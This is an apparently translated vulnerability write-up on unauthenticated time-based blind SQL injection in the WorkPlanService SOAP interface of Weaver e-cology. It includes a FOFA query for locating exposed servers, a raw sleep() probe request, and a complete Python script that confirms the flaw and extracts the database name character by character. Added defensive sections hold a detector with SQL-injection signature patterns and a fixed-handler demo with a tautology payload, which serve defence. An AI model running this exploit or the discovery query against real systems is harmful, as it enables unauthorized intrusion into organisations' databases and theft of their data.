SQL Injection in the Weaver (泛微) e-cology WorkPlanService Interface

0x00 Disclaimer

All techniques, information and tools covered in this article are provided for learning and reference only. Do not use them for illegal purposes; any illegal activity is unrelated to the author. Please comply with the Cybersecurity Law of the People's Republic of China.


Cybersecurity Law of the People's Republic of China

Article 27 provides:

No individual or organization may engage in activities that endanger cybersecurity, such as illegally intruding into others' networks, interfering with the normal functioning of others' networks, or stealing network data; may not provide programs or tools specifically intended for intruding into networks, interfering with normal network functions and protective measures, stealing network data, or other activities that endanger cybersecurity; and, knowing that another person is engaged in activities that endanger cybersecurity, may not provide that person with technical support, advertising, payment settlement or other assistance.


0x01 Product Overview

Weaver e-cology builds on a new design philosophy and new management thinking to create an efficient collaborative office environment for medium-sized and large organizations. It combines a standardized product with customized development and is positioned as OA software for group-type organizations.

0x02 Vulnerability Description

The WorkPlanService SOAP interface of the Weaver e-cology platform (exposed at /services/WorkPlanService) is vulnerable to SQL injection: the string parameter in0 of the deleteWorkPlan operation is placed into a database query without sanitization, so an unauthenticated caller can inject SQL. Because the response carries no query output, the injection is exploited as a time-based blind injection with sleep().

0x03 Asset Discovery

FOFA: app="泛微-EOffice"||app="泛微-OA(e-cology)"

Note that the 泛微-EOffice fingerprint matches Weaver's e-Office product line, which is a different code base from e-cology; the endpoint described in this article belongs to e-cology, so results from the first fingerprint still need to be confirmed against the request below.

0x04 Vulnerability Reproduction

4.1 Request testing

1. POST request (the in0 value below is a time-based probe: a vulnerable server stalls for about 5 seconds before answering)

POST /services/WorkPlanService HTTP/1.1
HOST: l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
    <soapenv:Header/>
      <soapenv:Body>
      <web:deleteWorkPlan>
         <!--type: string-->
         <web:in0>(select 111 from (select sleep(5))aaaa)</web:in0>
         <!--type: int-->
         <web:in1>22</web:in1> 
      </web:deleteWorkPlan>
      </soapenv:Body>
</soapenv:Envelope>

Test screenshot:
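The same request seen from the defender's side. This is an added example, not part of the original post and not e-cology code: a small detector that parses a SOAP body destined for /services/WorkPlanService, pulls in0 out of deleteWorkPlan, and flags anything that does not look like the parameter the operation expects. It assumes that a legitimate in0 is a single numeric id or a comma-separated list of ids (the post does not document the parameter's format, so that is an assumption); the namespace and element names are the ones from the request above, and every sample envelope is constructed in the block.

```python
# Added example (not from the original post, not e-cology code): flag SQL
# injection attempts in SOAP calls to WorkPlanService.deleteWorkPlan.
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WP_NS = "webservices.workplan.weaver.com.cn"   # namespace used in the request above

# Signatures that have no business in an id parameter. sleep()/benchmark() are the
# time-based markers used in this post; the rest are common boolean/union/comment tricks.
SQLI_PATTERNS = [
    re.compile(r"\bsleep\s*\(", re.I),
    re.compile(r"\bbenchmark\s*\(", re.I),
    re.compile(r"\bselect\b.+\bfrom\b", re.I | re.S),
    re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    re.compile(r"(\bor\b|\band\b)\s*[\w'\"]+\s*=\s*[\w'\"]+", re.I),
    re.compile(r"(--|#|/\*)"),
]
# Assumed legitimate shape of in0: one id, or a comma-separated list of ids.
ID_LIST = re.compile(r"^\s*\d+(\s*,\s*\d+)*\s*$")


def extract_in0(body: str):
    """Return the text of deleteWorkPlan/in0, or None if the body is not such a call."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    op = root.find(f".//{{{WP_NS}}}deleteWorkPlan")
    if op is None:
        return None
    in0 = op.find(f"{{{WP_NS}}}in0")
    return "" if in0 is None or in0.text is None else in0.text


def classify(body: str):
    """Return (verdict, reason); verdict is 'attack', 'benign' or 'ignore'."""
    in0 = extract_in0(body)
    if in0 is None:
        return "ignore", "not a deleteWorkPlan call"
    if ID_LIST.match(in0):
        return "benign", "in0 is a numeric id list"
    for pat in SQLI_PATTERNS:
        if pat.search(in0):
            return "attack", f"in0 matches {pat.pattern!r}"
    # Allow-list approach: anything that is not an id list is rejected even
    # without a known signature, so new payload styles still get caught.
    return "attack", "in0 is not a numeric id list"


def envelope(in0: str, in1: int = 22) -> str:
    """Build a deleteWorkPlan envelope; used here only to construct sample traffic."""
    return f"""<soapenv:Envelope xmlns:soapenv="{SOAP_NS}" xmlns:web="{WP_NS}">
  <soapenv:Header/>
  <soapenv:Body>
    <web:deleteWorkPlan>
      <web:in0>{in0}</web:in0>
      <web:in1>{in1}</web:in1>
    </web:deleteWorkPlan>
  </soapenv:Body>
</soapenv:Envelope>"""


# Constructed sample traffic, not captured data.
SAMPLES = {
    "page_payload": envelope("(select 111 from (select sleep(5))aaaa)"),
    "boolean":      envelope("1 or 1=1"),
    "legit":        envelope("1234, 5678"),
    "other_op":     envelope("1").replace("deleteWorkPlan", "getWorkPlan"),
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        verdict, reason = classify(body)
        print(f"{name:13s} -> {verdict:7s} ({reason})")
```

The allow-list check runs before the signature list on purpose: a WAF rule that only matches sleep() is trivially bypassed by benchmark(), heavy subqueries or boolean conditions, whereas rejecting everything that is not an id list needs no knowledge of the payload.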

4.2 Python script

Probe for the vulnerability and then enumerate the current database name (schema()) one character at a time through the time delay.

# -*- coding: utf-8 -*-
# Time-based blind SQL injection through the in0 parameter of
# WorkPlanService.deleteWorkPlan: confirm the delay, find the length of
# schema(), then recover it one character at a time.
import sys
import time
import requests

# Silence the warning that verify=False triggers on self-signed certificates
requests.packages.urllib3.disable_warnings()

DELAY = 3       # seconds the injected sleep() should stall a true condition
TIMEOUT = 20    # overall request timeout; a timeout counts as "no delay"

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a1b)XWEB/9165',
    'Content-Type': 'text/xml;charset=UTF-8',
}


def envelope(in0):
    """Wrap an in0 value in the deleteWorkPlan SOAP envelope shown above."""
    return f'''<soapenv:Envelope
  xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:web="webservices.workplan.weaver.com.cn"
>
    <soapenv:Header />
      <soapenv:Body>
      <web:deleteWorkPlan>
         <!--type: string-->
         <web:in0>{in0}</web:in0>
         <!--type: int-->
         <web:in1>22</web:in1>
      </web:deleteWorkPlan>
      </soapenv:Body>
</soapenv:Envelope>'''


def delayed(url0, condition):
    """Send one payload and return True if the server stalled for at least DELAY
    seconds, i.e. the injected SQL condition evaluated to true. On a slow link
    raise DELAY so that ordinary latency cannot be mistaken for sleep()."""
    in0 = f"(select 111 from (select (if({condition},sleep({DELAY}),1)))aaaa)"
    try:
        s = time.time()
        requests.post(url0, data=envelope(in0), headers=headers,
                      timeout=TIMEOUT, verify=False)
        return time.time() - s >= DELAY
    except requests.exceptions.RequestException as e1:
        print("An error occurred:", e1)
        return False


def len_(url0, sql_0):
    """Find the length of the expression sql_0 (tries 1..19)."""
    for n in range(1, 20):
        if delayed(url0, f"{n}=(select length({sql_0}))"):
            print(f"the len({sql_0}) is :  ", n)
            return n
    print("no result!!!maybe have error!!")
    sys.exit()


def name_(url0, len_l, sql_0):
    """Recover sql_0 character by character. MySQL substring() is 1-indexed, so
    positions run 1..len_l; the printable range 32..126 also covers digits and '_'."""
    nm_chr = []
    for i in range(1, len_l + 1):
        for nm_asc in range(32, 127):
            if delayed(url0, f"{nm_asc}=(select ascii(substring({sql_0},{i},1)))"):
                print(f"on the {i} is:", chr(nm_asc))
                nm_chr.append(chr(nm_asc))
                break
    if len(nm_chr) != len_l:
        print("find name fail or have error!!!! please check  !!!")
        sys.exit()
    print("find the name is:", ''.join(nm_chr))
    return ''.join(nm_chr)


def vuln_t(url):
    """Detection: an unconditional true branch must delay the response."""
    if delayed(url, "1=1"):
        print(f"find {url} exists vuln!!!")
        return 1
    print("maybe no vuln!!")
    return 0


if __name__ == "__main__":
    # Usage: python poc.py https://target
    url = sys.argv[1] if len(sys.argv) > 1 else "https://127.0.0.1"
    url0 = f"{url}/services/WorkPlanService"
    if vuln_t(url0):
        sql_0 = "schema()"
        name_(url0, len_(url0, sql_0), sql_0)
    print("complete!!!")

0x05 Remediation

Temporary mitigation

Use prepared statements with bound variables; validate and filter input; deploy a protective device (such as a WAF) in front of the system. Do not expose the affected system to the public internet unless necessary.

Upgrade fix

The vendor has released a new version that fixes the vulnerability. Obtain the upgrade package or patch from the official website or from vendor support and apply it as soon as possible.
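What "prepared statements and bound variables" change in practice, as an added example that is not e-cology code: the real endpoint is Java and its query is not shown in this post, so the block below models a hypothetical deleteWorkPlan handler in Python against an in-memory SQLite table, once with string concatenation (the bug class above) and once with input validation plus placeholders. Table name, column names, the sample rows and the assumption that in0 is a comma-separated id list are all constructed for the example; SQLite has no sleep(), so the injection here is a boolean one that widens the delete instead of a timing probe.

```python
# Added example (hypothetical handler, not e-cology code): the same delete
# written with concatenation and with bound parameters, run against SQLite.
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: four work plans owned by two users (createrid)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table workplan (id integer primary key, createrid integer, name text)")
    con.executemany("insert into workplan values (?, ?, ?)", [
        (1, 22, "plan A"), (2, 22, "plan B"), (3, 31, "plan C"), (4, 31, "plan D"),
    ])
    con.commit()
    return con


def delete_vulnerable(con, in0: str, in1: int) -> int:
    """Attacker-controlled in0 is spliced straight into the SQL text."""
    sql = f"delete from workplan where id in ({in0}) and createrid = {in1}"
    cur = con.execute(sql)
    con.commit()
    return cur.rowcount


# Assumed legitimate shape of in0: one id, or a comma-separated list of ids.
ID_LIST = re.compile(r"^\s*\d+(\s*,\s*\d+)*\s*$")


def delete_fixed(con, in0: str, in1: int) -> int:
    """Validate in0 as an id list, then bind every value; nothing from in0 reaches
    the SQL text, so the query structure cannot change."""
    if not ID_LIST.match(in0):
        raise ValueError("in0 must be a comma-separated list of integer ids")
    ids = [int(x) for x in in0.split(",")]
    placeholders = ",".join("?" * len(ids))
    sql = f"delete from workplan where id in ({placeholders}) and createrid = ?"
    cur = con.execute(sql, [*ids, int(in1)])
    con.commit()
    return cur.rowcount


def remaining(con) -> int:
    return con.execute("select count(*) from workplan").fetchone()[0]


def demo():
    """Run one injected in0 through both handlers.
    Returns (deleted by vulnerable, deleted by fixed, rows left vuln, rows left fixed)."""
    # "1) or 1=1 --" closes the IN (...) list, adds a tautology and comments out
    # the createrid check, so the vulnerable statement deletes every row.
    payload = "1) or 1=1 --"
    vuln = make_db()
    deleted_vuln = delete_vulnerable(vuln, payload, 22)
    fixed = make_db()
    try:
        deleted_fixed = delete_fixed(fixed, payload, 22)
    except ValueError:
        deleted_fixed = 0      # rejected before any SQL ran
    return deleted_vuln, deleted_fixed, remaining(vuln), remaining(fixed)


if __name__ == "__main__":
    dv, df, rv, rf = demo()
    print(f"vulnerable handler: deleted {dv} rows, {rv} left")
    print(f"fixed handler:      deleted {df} rows, {rf} left")
```

The validation step is what makes the fix complete: binding alone would still accept a string where an integer list is expected, and the allow-list regex turns any payload into a rejected request before the database sees it, which is also the check a WAF in front of the system would enforce as the interim measure above.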
